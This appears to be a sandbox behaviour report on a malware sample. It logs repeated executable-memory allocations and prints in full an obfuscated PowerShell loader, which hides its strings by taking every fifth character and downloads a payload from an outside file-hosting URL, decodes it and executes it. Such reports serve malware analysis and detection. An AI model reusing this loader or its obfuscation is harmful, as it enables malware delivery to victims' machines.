allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0249b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024cc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049ed000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049ee000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049ef000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049f1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049f3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049f4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline POWERSHELL "<#Lipread Libanons Rafles Aarbgerne #><#Hundespand Topskuddenes Hildebrandine #>$Tyrolervals='Autopathography';function Trningsdragten($Retninger){If ($host.DebuggerEnabled) {$Aktivstoffets=4} for ($Crackerberry=$Aktivstoffets;;$Crackerberry+=5){if(!$Retninger[$Crackerberry]) { break }$Rekonstruhxr+=$Retninger[$Crackerberry]}$Rekonstruhxr}function Indtrre($Graveolency){ .($Decemvir) ($Graveolency)}$Antebridal=Trningsdragten 'klumNClumeG anTB sr.RefrWRosoeprehb DatcKingLIndliBetvE.abbnBertT';$Tonguing=Trningsdragten 'VensMRo.ko muszDansi SpelMonol Manas ri/';$Preage=Trningsdragten ',ardTImmolSwivsRen 1,ymb2';$Sobrere=' Sak[ M,cn raieStiftFord. Mhlsthu ETndeRHeveVFabriPea.c A eEUdfaP RivoN ntIAmirNTavlTPundmToodA Ab Nsluta enig OblEstj.rV js]Udsp:Reco:beskSSuffEfangCUnmouRe erConjiAlimT AksyUnsyPforfRCykloBa btFricO CamCMicrofdeklBrad=Sla $ pblPOktaR Im.E ForAAnnaGu,trE';$Tonguing+=Trningsdragten 'I te5 s t.Pach0Lamp ec(UdbuWEtati,tranRe.sdFuldoTom wForlsRipi ProgN FavTH rd Fore1B,na0 ild.Rawh0bagt;Over striW ydiV linFlso6Forn4 rla;Cock Di cxBegy6 fsa4Flam;g ap Mi drC.usvC.ra:Dock1Cyst3 al1Or.h.Pile0Fer )Tube DubGSaudeMi tcRewokNatao rt/bosw2C.ik0Se i1 pal0 Per0Aut.1Teat0 At,1Swat hydrF pe iKi,gr SuceMappfBa foSowtx Hyp/Jogg1 ong3 ere1Pemp..yst0';$Rstet=Trningsdragten 'Rinku rosBastESlagrPoly- TraaPhonGDarweUdstnTra,t';$Counterarguments243=Trningsdragten 'RavihBlodtTraatAvulpFae s Fre:Re,t/Ur.c/WeekfHolbiCasslLet,eal.edSm lnE.ox.die.eJaunuSkr / Kl lBes.9Bestt MasESam wO erb Ic 9Rad s S p6FlgeaSt,raParaRIndkwCra 5BantfNep y ,doU mbiiDaora rotCsnig0StedlU apfF ri/SjalKSm toSternStamt affr evo eadlRe,ep HomuDelalIschtUnpue GalnBesteTs,r.brndpRdbgs remd';$Mureren=Trningsdragten 'mani>';$Decemvir=Trningsdragten 'Skami posEAr ex';$Grundskyldpromille='Dotationers';$Refleksbevgelserne='\Haremmets184.Ink';Indtrre (Trningsdragten 'Folk$MopeG MicLNatuoSecubM.lta EneLOutr:To.ssAmalkAcr oW.ttm HusaNudagUn.cEF.rsr FodSmy,tvHypeE EntnEnigdvernE ibbN,linS,edg=Cocc$FrsteUdstnNitrVFort:RnneASt gPMassPForadSkikaSpuntUnopaChe + at$B lbr NoneTundFUncoLArsee BulKHaanS ktibr.nle Gu.V,enngHalve ernlGeneS BibEAd lrCo sNIvore');Indtrre (Trningsdragten 'Gene$No,ig udbl Sveo TemB ulva Kablfngs:sponsBea kGeneR korITimeV Un.E CenS nexTBisai HuslAfs SConc=Traf$N,maCP inOStyruOmenn PuntGennEBal,rWeddaU aaR Sp gBie uTi eM,ongEMejenZoodtRundsAbso2Stra4Ages3Unpi. ykkSBeloPK ldLPasnIReveTXipe(eva,$ TramTulluEmalRTimbEJourRSherEFrienSnor)');Indtrre (Trningsdragten $Sobrere);$Counterarguments243=$Skrivestils[0];$Teledendrion=(Trningsdragten 'Jewe$KamkgFo sL Ta.oBestBSkraaDe il G.a:CereAModscA,umCForuu C lB NonA Je tSoftiSek O.iscnNdsi= skiN .ayE Ka W,lut-U,loOvalsBtracJKkseETestCPleatMilo em swig,YTam,S EmhtPer.echelmLgdo. Krm$ .maARaggN riktLivseTjleBM.llrConvI S rdOprraRegaL');Indtrre ($Teledendrion);Indtrre (Trningsdragten 'Refl$Cel,A ypocAdrec NumuLycobPrepa Tyrt SysiF etoIs hnD gs.hi sHTilse Re a AspdOvereFolkrSprns Ald[Whip$FerrRHovesFrartInteeMaintdiff]Ant =Veri$ Se,TFlipoAttensurrgatabuC meiSa.rnLuscg');$Skruetrkkeren=Trningsdragten ' jer$EffeAC prc Ni.cmidjuvandb RhiaTakttSwadi EuhoDiscnB st.OpmuDAsfao U twI.dsn Banl SploPolyaVenddpa lFDenti SuplB adeKert(La,e$HeteCuberoAfs.uOleon,ilstDupeeSek r TemaPrivrFin g AbauPhagmKurse As nThintDvrgsDain2V rb4 ren3spar,Noun$MatiFSunniScelnI,oniSouns I.vhungaeroc.d,akt)';$Finished=$skomagersvendens;Indtrre (Trningsdragten 'Cata$Un ogMi,mlFumaOSkruBRonaATranlCrem: TubmB raaRanenM.erUM.anfS naaRumfk SknTEup.uDisaRSinghFrusAMoonn StoD AddlRe he LeoRTeknsTro =Ret,(DeblTStireIndusOctuT ira-Smr PJudiAFlfoTfor.hHa i Leuk$Outsf tori.verNTankIAv,rssiz,hV neePotadA sk)');while (!$Manufakturhandlers) {Indtrre (Trningsdragten 'Vid $SatigaritlG anoT aabforsaFuthl,app:,udiHGynaaTra nAlu d .kas PaykStraeO tlrStykuSibymOversTw.rlDisiyIntes,vereSp etKaffs Top=Ord.$HospHNonpuAsmit W,glDemoeKvalnMotodSciee') ;Indtrre $Skruetrkkeren;Indtrre (Trningsdragten 'A.erSHermtansvaForurDisttElem-nednsOv ll VicEKatee pukpBl,t mae4');Indtrre (Trningsdragten ' Gli$,skeG A tlAposOSkalB A,raMastLUbnd:UndoMmaxia An nFranUOmbrFKonga TimKsumptPteru ChorVagahInteA opvnKrigD LiglK ageUnwrrAn.esBumb=En.e(LevnTinteECeyls.sykt mme-G ldPVi,raImplT micHV ll .uis$ hrfBesgiSpecnUn eiAabnsUnseH Un,EMaandReen)') ;Indtrre (Trningsdragten 'c.ra$ AnggIndeLMe cOtoucbBackaBrdpLTr.e:T reH BacASvalaBogmN Netl ActiSaluGFlu Ehents.lag=Dyf $Ne,vg KviLFranOChicBS.ycAPortlFire:S ritMvreEKvikSHyttTKre aFasc1Broo2.ore2card+ Uds+Conv%At.e$Eksps SurKInderTe,sIBo evFifaePo.ySTrimTOpfyiTokslKursSkalk.InstC ,eto ndiuAtron andt') ;$Counterarguments243=$Skrivestils[$Haanliges]}$nomaden=306426;$overconscientiousness=29815;Indtrre (Trningsdragten ' For$HierGNulllTlinoRediBMembAhalvlSe.i: ObccSlaguresumTyk,MPuppeAflsrCrepB SooUAnonnte ad.rid rag= Sto UddaGNo,meYapptHarm-StemcUnspO.ortNNonpTRi ieAnchn,enut,tad res$Hypof Prai SvanOpkaI N,gSSplaHGrune LobD');Indtrre (Trningsdragten ' idr$SlaggSkrilPulcoPolyb eucaTroml Ska:AfsiR Udtu.ffieEufowFriloSilirHagltMedf1 Uni0Mlle0Samt Vo a=Revo crat[ aaS Lo,yBeo sPrivtC,aneS.ism,icr.Beb C,eneoDeten stivUbe,e Magr,eint Mar]Sttt:E ph: auvFfunkrNul o TndmBundBNontaRelasTynge Bes6Hjer4ReinSClontAsparPolei Seln efrgSoci(Rumm$ hacCH lvu ArimF ngmShove UrurEkstbSupeuCappnov rdS,mp)');Indtrre (Trningsdragten 'd ve$CoungAfseL Sg o.ealB AdgACa cL Bre: emiITrasTamatIAf nNPeruEEvolRTil AH,tcr BagYAnap Bri =To.d Inte[AppeSSp.cYLuggS udsTOligetingmHavf.HyleTTriceImmeX.ingtRes..LokoEUdbenPothCU.who iredPresI skjnMerlgIndp]A bu:Octo: tipAMistSStriCRomii supI Til.ReseGme,iEEmottstarS eblTBakorSpalIWrisn ImpGgibl(Scu,$Kom,R GasuUnheekyleWJachO aakrServTkloa1Qui 0 l v0Rout)');Indtrre (Trningsdragten ' Out$ ntgFly lSoroo ZilBRegiARr,aLSti.:PrersS otT wari ErhL FalLLydriHaslNOutrGSkrdSSlada AmanIdeon UncoMorsNBattcBekre.esoRBlya= Prv$OplyiSoulTBurgIC loNaspaeIcefRA.teAVelaRTropyT.tq.BagvSJu pUOmfoBEntosPepttDem,rFremILincN ArbgUdre(Tilt$RigsNNeutO g.nmUdtraDandDSorteHoasNWun , Ref$FiliOEchiV sseE Sn,R ympcK,eeOHo eN SmaSunc.csvolI DieeIsodnPateTDox,I DhoODialuTr ksCounN,ratE.aseSPygmSSte )');Indtrre $Stillingsannoncer;"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Lipread Libanons Rafles Aarbgerne #><#Hundespand Topskuddenes Hildebrandine #>$Tyrolervals='Autopathography';function Trningsdragten($Retninger){If ($host.DebuggerEnabled) {$Aktivstoffets=4} for ($Crackerberry=$Aktivstoffets;;$Crackerberry+=5){if(!$Retninger[$Crackerberry]) { break }$Rekonstruhxr+=$Retninger[$Crackerberry]}$Rekonstruhxr}function Indtrre($Graveolency){ .($Decemvir) ($Graveolency)}$Antebridal=Trningsdragten 'klumNClumeG anTB sr.RefrWRosoeprehb DatcKingLIndliBetvE.abbnBertT';$Tonguing=Trningsdragten 'VensMRo.ko muszDansi SpelMonol Manas ri/';$Preage=Trningsdragten ',ardTImmolSwivsRen 1,ymb2';$Sobrere=' Sak[ M,cn raieStiftFord. Mhlsthu ETndeRHeveVFabriPea.c A eEUdfaP RivoN ntIAmirNTavlTPundmToodA Ab Nsluta enig OblEstj.rV js]Udsp:Reco:beskSSuffEfangCUnmouRe erConjiAlimT AksyUnsyPforfRCykloBa btFricO CamCMicrofdeklBrad=Sla $ pblPOktaR Im.E ForAAnnaGu,trE';$Tonguing+=Trningsdragten 'I te5 s t.Pach0Lamp ec(UdbuWEtati,tranRe.sdFuldoTom wForlsRipi ProgN FavTH rd Fore1B,na0 ild.Rawh0bagt;Over striW ydiV linFlso6Forn4 rla;Cock Di cxBegy6 fsa4Flam;g ap Mi drC.usvC.ra:Dock1Cyst3 al1Or.h.Pile0Fer )Tube DubGSaudeMi tcRewokNatao rt/bosw2C.ik0Se i1 pal0 Per0Aut.1Teat0 At,1Swat hydrF pe iKi,gr SuceMappfBa foSowtx Hyp/Jogg1 ong3 ere1Pemp..yst0';$Rstet=Trningsdragten 'Rinku rosBastESlagrPoly- TraaPhonGDarweUdstnTra,t';$Counterarguments243=Trningsdragten 'RavihBlodtTraatAvulpFae s Fre:Re,t/Ur.c/WeekfHolbiCasslLet,eal.edSm lnE.ox.die.eJaunuSkr / Kl lBes.9Bestt MasESam wO erb Ic 9Rad s S p6FlgeaSt,raParaRIndkwCra 5BantfNep y ,doU mbiiDaora rotCsnig0StedlU apfF ri/SjalKSm toSternStamt affr evo eadlRe,ep HomuDelalIschtUnpue GalnBesteTs,r.brndpRdbgs remd';$Mureren=Trningsdragten 'mani>';$Decemvir=Trningsdragten 'Skami posEAr ex';$Grundskyldpromille='Dotationers';$Refleksbevgelserne='\Haremmets184.Ink';Indtrre (Trningsdragten 'Folk$MopeG MicLNatuoSecubM.lta EneLOutr:To.ssAmalkAcr oW.ttm HusaNudagUn.cEF.rsr FodSmy,tvHypeE EntnEnigdvernE ibbN,linS,edg=Cocc$FrsteUdstnNitrVFort:RnneASt gPMassPForadSkikaSpuntUnopaChe + at$B lbr NoneTundFUncoLArsee BulKHaanS ktibr.nle Gu.V,enngHalve ernlGeneS BibEAd lrCo sNIvore');Indtrre (Trningsdragten 'Gene$No,ig udbl Sveo TemB ulva Kablfngs:sponsBea kGeneR korITimeV Un.E CenS nexTBisai HuslAfs SConc=Traf$N,maCP inOStyruOmenn PuntGennEBal,rWeddaU aaR Sp gBie uTi eM,ongEMejenZoodtRundsAbso2Stra4Ages3Unpi. ykkSBeloPK ldLPasnIReveTXipe(eva,$ TramTulluEmalRTimbEJourRSherEFrienSnor)');Indtrre (Trningsdragten $Sobrere);$Counterarguments243=$Skrivestils[0];$Teledendrion=(Trningsdragten 'Jewe$KamkgFo sL Ta.oBestBSkraaDe il G.a:CereAModscA,umCForuu C lB NonA Je tSoftiSek O.iscnNdsi= skiN .ayE Ka W,lut-U,loOvalsBtracJKkseETestCPleatMilo em swig,YTam,S EmhtPer.echelmLgdo. Krm$ .maARaggN riktLivseTjleBM.llrConvI S rdOprraRegaL');Indtrre ($Teledendrion);Indtrre (Trningsdragten 'Refl$Cel,A ypocAdrec NumuLycobPrepa Tyrt SysiF etoIs hnD gs.hi sHTilse Re a AspdOvereFolkrSprns Ald[Whip$FerrRHovesFrartInteeMaintdiff]Ant =Veri$ Se,TFlipoAttensurrgatabuC meiSa.rnLuscg');$Skruetrkkeren=Trningsdragten ' jer$EffeAC prc Ni.cmidjuvandb RhiaTakttSwadi EuhoDiscnB st.OpmuDAsfao U twI.dsn Banl SploPolyaVenddpa lFDenti SuplB adeKert(La,e$HeteCuberoAfs.uOleon,ilstDupeeSek r TemaPrivrFin g AbauPhagmKurse As nThintDvrgsDain2V rb4 ren3spar,Noun$MatiFSunniScelnI,oniSouns I.vhungaeroc.d,akt)';$Finished=$skomagersvendens;Indtrre (Trningsdragten 'Cata$Un ogMi,mlFumaOSkruBRonaATranlCrem: TubmB raaRanenM.erUM.anfS naaRumfk SknTEup.uDisaRSinghFrusAMoonn StoD AddlRe he LeoRTeknsTro =Ret,(DeblTStireIndusOctuT ira-Smr PJudiAFlfoTfor.hHa i Leuk$Outsf tori.verNTankIAv,rssiz,hV neePotadA sk)');while (!$Manufakturhandlers) {Indtrre (Trningsdragten 'Vid $SatigaritlG anoT aabforsaFuthl,app:,udiHGynaaTra nAlu d .kas PaykStraeO tlrStykuSibymOversTw.rlDisiyIntes,vereSp etKaffs Top=Ord.$HospHNonpuAsmit W,glDemoeKvalnMotodSciee') ;Indtrre $Skruetrkkeren;Indtrre (Trningsdragten 'A.erSHermtansvaForurDisttElem-nednsOv ll VicEKatee pukpBl,t mae4');Indtrre (Trningsdragten ' Gli$,skeG A tlAposOSkalB A,raMastLUbnd:UndoMmaxia An nFranUOmbrFKonga TimKsumptPteru ChorVagahInteA opvnKrigD LiglK ageUnwrrAn.esBumb=En.e(LevnTinteECeyls.sykt mme-G ldPVi,raImplT micHV ll .uis$ hrfBesgiSpecnUn eiAabnsUnseH Un,EMaandReen)') ;Indtrre (Trningsdragten 'c.ra$ AnggIndeLMe cOtoucbBackaBrdpLTr.e:T reH BacASvalaBogmN Netl ActiSaluGFlu Ehents.lag=Dyf $Ne,vg KviLFranOChicBS.ycAPortlFire:S ritMvreEKvikSHyttTKre aFasc1Broo2.ore2card+ Uds+Conv%At.e$Eksps SurKInderTe,sIBo evFifaePo.ySTrimTOpfyiTokslKursSkalk.InstC ,eto ndiuAtron andt') ;$Counterarguments243=$Skrivestils[$Haanliges]}$nomaden=306426;$overconscientiousness=29815;Indtrre (Trningsdragten ' For$HierGNulllTlinoRediBMembAhalvlSe.i: ObccSlaguresumTyk,MPuppeAflsrCrepB SooUAnonnte ad.rid rag= Sto UddaGNo,meYapptHarm-StemcUnspO.ortNNonpTRi ieAnchn,enut,tad res$Hypof Prai SvanOpkaI N,gSSplaHGrune LobD');Indtrre (Trningsdragten ' idr$SlaggSkrilPulcoPolyb eucaTroml Ska:AfsiR Udtu.ffieEufowFriloSilirHagltMedf1 Uni0Mlle0Samt Vo a=Revo crat[ aaS Lo,yBeo sPrivtC,aneS.ism,icr.Beb C,eneoDeten stivUbe,e Magr,eint Mar]Sttt:E ph: auvFfunkrNul o TndmBundBNontaRelasTynge Bes6Hjer4ReinSClontAsparPolei Seln efrgSoci(Rumm$ hacCH lvu ArimF ngmShove UrurEkstbSupeuCappnov rdS,mp)');Indtrre (Trningsdragten 'd ve$CoungAfseL Sg o.ealB AdgACa cL Bre: emiITrasTamatIAf nNPeruEEvolRTil AH,tcr BagYAnap Bri =To.d Inte[AppeSSp.cYLuggS udsTOligetingmHavf.HyleTTriceImmeX.ingtRes..LokoEUdbenPothCU.who iredPresI skjnMerlgIndp]A bu:Octo: tipAMistSStriCRomii supI Til.ReseGme,iEEmottstarS eblTBakorSpalIWrisn ImpGgibl(Scu,$Kom,R GasuUnheekyleWJachO aakrServTkloa1Qui 0 l v0Rout)');Indtrre (Trningsdragten ' Out$ ntgFly lSoroo ZilBRegiARr,aLSti.:PrersS otT wari ErhL FalLLydriHaslNOutrGSkrdSSlada AmanIdeon UncoMorsNBattcBekre.esoRBlya= Prv$OplyiSoulTBurgIC loNaspaeIcefRA.teAVelaRTropyT.tq.BagvSJu pUOmfoBEntosPepttDem,rFremILincN ArbgUdre(Tilt$RigsNNeutO g.nmUdtraDandDSorteHoasNWun , Ref$FiliOEchiV sseE Sn,R ympcK,eeOHo eN SmaSunc.csvolI DieeIsodnPateTDox,I DhoODialuTr ksCounN,ratE.aseSPygmSSte )');Indtrre $Stillingsannoncer;"
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: POWERSHELL
parameters: "<#Lipread Libanons Rafles Aarbgerne #><#Hundespand Topskuddenes Hildebrandine #>$Tyrolervals='Autopathography';function Trningsdragten($Retninger){If ($host.DebuggerEnabled) {$Aktivstoffets=4} for ($Crackerberry=$Aktivstoffets;;$Crackerberry+=5){if(!$Retninger[$Crackerberry]) { break }$Rekonstruhxr+=$Retninger[$Crackerberry]}$Rekonstruhxr}function Indtrre($Graveolency){ .($Decemvir) ($Graveolency)}$Antebridal=Trningsdragten 'klumNClumeG anTB sr.RefrWRosoeprehb DatcKingLIndliBetvE.abbnBertT';$Tonguing=Trningsdragten 'VensMRo.ko muszDansi SpelMonol Manas ri/';$Preage=Trningsdragten ',ardTImmolSwivsRen 1,ymb2';$Sobrere=' Sak[ M,cn raieStiftFord. Mhlsthu ETndeRHeveVFabriPea.c A eEUdfaP RivoN ntIAmirNTavlTPundmToodA Ab Nsluta enig OblEstj.rV js]Udsp:Reco:beskSSuffEfangCUnmouRe erConjiAlimT AksyUnsyPforfRCykloBa btFricO CamCMicrofdeklBrad=Sla $ pblPOktaR Im.E ForAAnnaGu,trE';$Tonguing+=Trningsdragten 'I te5 s t.Pach0Lamp ec(UdbuWEtati,tranRe.sdFuldoTom wForlsRipi ProgN FavTH rd Fore1B,na0 ild.Rawh0bagt;Over striW ydiV linFlso6Forn4 rla;Cock Di cxBegy6 fsa4Flam;g ap Mi drC.usvC.ra:Dock1Cyst3 al1Or.h.Pile0Fer )Tube DubGSaudeMi tcRewokNatao rt/bosw2C.ik0Se i1 pal0 Per0Aut.1Teat0 At,1Swat 